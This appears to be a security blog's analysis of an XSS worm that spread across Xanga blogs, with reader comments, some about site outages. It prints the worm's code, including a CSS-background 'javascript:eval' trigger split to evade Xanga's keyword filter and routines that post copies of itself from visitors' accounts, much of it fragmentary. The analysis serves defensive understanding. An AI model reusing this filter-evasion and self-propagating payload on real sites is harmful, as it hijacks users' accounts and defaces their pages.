Xanga Hit By Script Worm

Following in the footsteps of fellow blog provider MySpace, Xanga.com appears to have been infected with some kind of worm that compromises the accounts of blog users and replaces content on the sites in order to replicate.

Infected sites can easily be recognized by the following text:

xangas admin owned you.

im a motha fuckin balleR, DG4L.
greets to phrea,camzero,majestic,dgs
“got steve case up on the phone, bitch this camo youve been owned.”
free cam0.

More information as I have it.

[UPDATE: As of 0714 UTC on 31 December, Xanga was apparently shut down in a bid to contain the infection. The shutdown lasted a few minutes, but I have confirmed that the worm is being removed from infected sites, and has been rendered inert by recent changes made on xanga.com. My analysis of the worm follows.]

Technical Overview

The worm consists of a simple HTML/script combination, and is highly primitive in nature. The worm propagates by using the XMLHTTP interface in some browsers to create worm-infected posts on the xanga weblogs of users who visit an infected site while signed in. This approach blurs the line between worm and old-style file infecting viruses. I’ll refer to it as a worm for clarity, since most of the literature on the recent MySpace attack uses the same term. Of particular note is that the worm is ‘dumb’ — it will repeatedly repost itself to previously-infected sites. The attack is extremely noisy, with each post carrying the malware’s obnoxious message.

Aside from the fact that such immature and badly-written messages as the one dropped by the worm would already stand out on most xanga blogs (that I care to read, anyway), the incessant reposting as the worm spread more than likely caused serious clogging. As a result, this worm’s life was extremely short. It is already over as you’re reading this analysis.

It appears upon further research that this worm was a variant of the similar Exodus worm that went quietly and unnoticed on December 19th. It was only in researching this outbreak that I saw the reports of Exodus. It appears that neither worm was written by a very skilled individual, as both strains are easily uprooted, browser-specific, badly-structured, trivially-decoded, and unnecessarily bloated. The worm is technically unimpressive (particularly vis-a-vis Exodus) and is a feat on par with the scores of VBSWG tweaks and edits following the infamous “Kournikova” worm outbreak of 2001.


Xanga.com have taken steps to render existing worm code inert (namely to prevent copycat code from spreading), so users can clean up the worm infection by simply entering their sites in Safe Mode and removing the worm’s infected posts.

Detailed Analysis / Code

The first section of the code can easily be identified as the portion responsible for producing the obscene message:

<h4 class="itemTitle">xangas admin owned you.</h4>im a motha fuckin balleR, DG4L.<br>greets to phrea,camzero,majestic,dgs<br>"got steve case up on the phone, bitch this camo youve been owned."<br>free cam0.

The active portion of the worm is contained entirely in a DIV tag. It has three attributes (ID, STYLE, and CODE):

<DIV id=wormy style="BACKGROUND: url(java
al(document.all.wormy.code))" code="[virus body]"></DIV>

The ‘background’ CSS property is used to refer to a background image for an element. The worm appears to use white space to evade the trivial ‘ ‘ URL filter in place on xanga.com. The background image URL is resolved by the browser to:


This small section of code triggers the worm’s execution. Alert readers will notice that this construct is a product of non-standard functionality in Internet Explorer. It fails to run in Firefox, as I suspect it does in many other alternative browsers.

I received the worm in an inert format that had been apparently disinfected by run-time filtering on xanga.com’s web site that was added after the infection began. I’ve slightly altered the code to make it more readable and to reverse the effects of the filtering.

The worm has a global portion of its code, as well as seven sub-routines. The global portion simply builds the defacement message above before handing off control to main, the worm’s dispatch procedure.

var chr = find(document.body.innerHTML,'style=','HEIGHT');
var J;
var con='im a motha fuckin balleR, DG4L.<br>greets to phrea,camzero,majestic,dgs<br>'+chr+'got steve case up on the phone, bitch this camo youve been owned.'+chr+'<br>free cam0.';
var code;

The code in main reconstructs the worm’s source code using DHTML properties (using its find subprocedure to perform a simple text pattern search) and then calls the httpSend procedure. It delivers three arguments to httpSend:
[1] = STRING '/private/xtools/xtoolspremium.aspx'
[2] = REFERENCE to 'postwormy'
[3] = STRING 'GET'

function main(){
code='<D'+'IV id=wormy style='+chr+'BACKGROUND: url(java\nscript:ev\nal(document.all.wo'+'rmy.code'+find(document.body.innerHTML,'wo'+'rmy.code','<NO'+'SCR'+'IPT>')+'<NO'+'SCR'+'IPT>'

function find(BF,BB,BC){
var R=BF.indexOf(BB)+BB.length;
var S=BF.indexOf(BC,R+1);
return BF.substring(R,S)

The httpSend procedure accepts four arguments. This results in the fourth argument being undefined. The httpSend routine sets a callback procedure and then transmits the request:

function httpSend(BH,BI,BJ,BK){
return false
return true

The postwormy routine is called when the HTTP transaction is complete. Once this has taken place, the worm has retreived a copy of /private/xtoolspremium.aspx, which is the posting form for writing and editing blog entries on Xanga.com. This callback function does the “dirty work” of the worm’s propagation, crafting a POST request to create a new blog entry. Some parts of the request are taken from the page it just retreived:

function postwormy(){
var AU=J.responseText;
var AS=new Array();
AS['__VIEWSTATE']=find(AU,'name='+chr+'__VIEWSTATE'+chr+' value='+chr,chr);
AS['txtTitle']='xangas admin owned you.';
AS['txtUserId']=find(AU,'name='+chr+'txtUserId'+chr+' type='+chr+'text'+chr+' value='+chr,chr);

The getXMLObj routine is a helper in both cases. It tries various methods of obtaining XMLHTTP objects that are associated with different browsers, in an attempt to avoid creating a browser dependency. The object it returns is then used to conduct the worm’s HTTP session:

function getXMLObj(){
var Z=false;
Z=new XMLHttpRequest()
} else if(window.ActiveXObject){
Z=new ActiveXObject('Msxml2.XMLHTTP')
Z=new ActiveXObject('Microsoft.XMLHTTP')
return Z

The stop function called as a callback during the POST request is a mere stub. It has no real purpose.

function stop(){

The paramsToString function is used during the generation of the request body for the worm’s POST request. It functions as a very simplistic URL encoder. The author elected not to use regular expressions for the replacement, and as a result, the loop in this routine is far more intensive than necessary:

function paramsToString(AV){
var N=new String();
var O=0;
for(var P in AV){
var Q=escape(AV[P]);
return N

The worm is quite simple, and even more simple to block: simple text-based matching and filtering on keywords in the worm code appears to have been used to thwart the worm. Indeed, this worm is not much of a “big picture” concern, but it could very well reflect where malware will go in the future. As technology becomes increasingly web-dependent, expect malware to adapt and to begin targeting web application platforms. We’ve seen it with worms like Santy, and we’ll see more of it in the days to come.

  • Pingback: SecuriTeam Blogs » Blog Attacks - The Next Generation ™

  • tc

    “The worm is quite simple, and even more simple to block: simple text-based matching and filtering on keywords in the worm code appears to have been used to thwart the worm.”

    Dependence on keyword blocking (in this case ‘javascript’ that in IE is rendered even with line breaks in the middle) is exactly left Xanga vulnerable to this attack.

    Javascript is a versatile language that can find many ways around server side filters (notice none of the exploit code required double quotes, and that key terms such as script, javascript, and eval were broken up using various methods to avoid filters). Especially when individual browsers decide to do stupid things which you (the website) can’t control, the only solution is to NOT use a blacklist, NOT use a whitelist, but instead validate and filter all input for HTML/javascript code.

    Either remove or encode all javascript/html code from GET and POST requests. This means ” ‘ ; ( ) etc.

  • tc

    Add greater than and less than signs to that list of values to be removed/encoded.

  • Pingback: Minh’s Notes

  • Pingback: SecuriTeam Blogs » Comment Spam: new trends, failing counter-measures and why it’s a big deal

  • http://www.xanga.com Taylor Tilton

    hey can you help me put a new bacground on my xanga? plez well thx
    Taylor Tilton

  • http://www.xanga.com Taylor Tilton


  • Pingback: ha.ckers.org » Blog Archive » Xanga XSS worm

  • Donavann

    i need to know how to make a web-site

  • Pingback: SecuriTeam Blogs » Political Hacking Hits MySpace with Another Worm

  • http://www.xanga.com/nicole9keewatin wondereye10@hotmail.com


    server from school at mount royal colloge calgary alberta

    the server is

    down from this institute with in 30 minutes of this letter

    the site itself is marked safe i’m trying to contact service team because i’m aware that it could be hacker related
    my site is still funtioning

    the whole service exchange for xanga is not working at the school

    front web page for exanga is not even showing

    thank you

  • Jude Marshall

    The entire Xanga site has been currently shutdown since this morning of the 20th, it is still down at 4pm (Eastern)
    The site originally came as “Xanga page not found.”
    Although it was the homepage I was looking for.
    Now it won’t even go to that and comes up merely as a 404: The webpage cannot be found.

    So what is going on? Hacker related or did they shut it down to contain another infection?

  • Tammy

    Same thing is going on here. It’s still 404: The webpage cannot be found.

  • Sarah

    I’m having the same issue. I’ve tried all of the different access pages I could, including going through weblogs, friend’s pages and profiles. It still shows up through google, but gives me a 404 if I try to click on the link. Something’s going crazy….

  • marley

    I can’t get Xanga to come up either! I’ve tried reaching it through Google, and I’ve also tried going to specific Xangas! I get the same 404 message… =[

  • Jude Marshall

    It’s been 7.5 hours since I originally found xanga off the internet.

    Does anyone know whats going on yet?

  • Kaylin Blake

    Does anyone kno if xanga is coming backk????

  • lauren

    is xanga over ..for good .and if not when will it come back.

  • Sam

    Certain aspects of the site are still up and running, for example the safety site and press centre. And one or two of the blogs. It’s all rather odd. Are they trying to contain another worm or something that they know is on a blog, or has one of the servers gone down, and all the others (like the help one), still running?

  • Sam

    Now the personal stuff is ok, but groups and blog rings are still knackered

  • Sam

    Ah. “xanga is currently offline for maintainance. We appologise for any inconvenience”. To find this, hover over VIDEO or something and read what comes up in the “Snap” box. You can view profiles, pictures and your home site, but not other people’s blogs, videos, pulse and stuff

  • Pingback: Adnan Masood's Weblog! عدنان مسعود

  • http://Xanga Mimi

    Omg!!!! I can’t find Xanga :O I tried reaching it through Google… but it says that, that page isn’t found. That sucks.

  • http://Xanga Mimi

    Omg!!!! I can’t find Xanga :O I tried reaching it through other websites… but it says that, that page isn’t found. That sucks.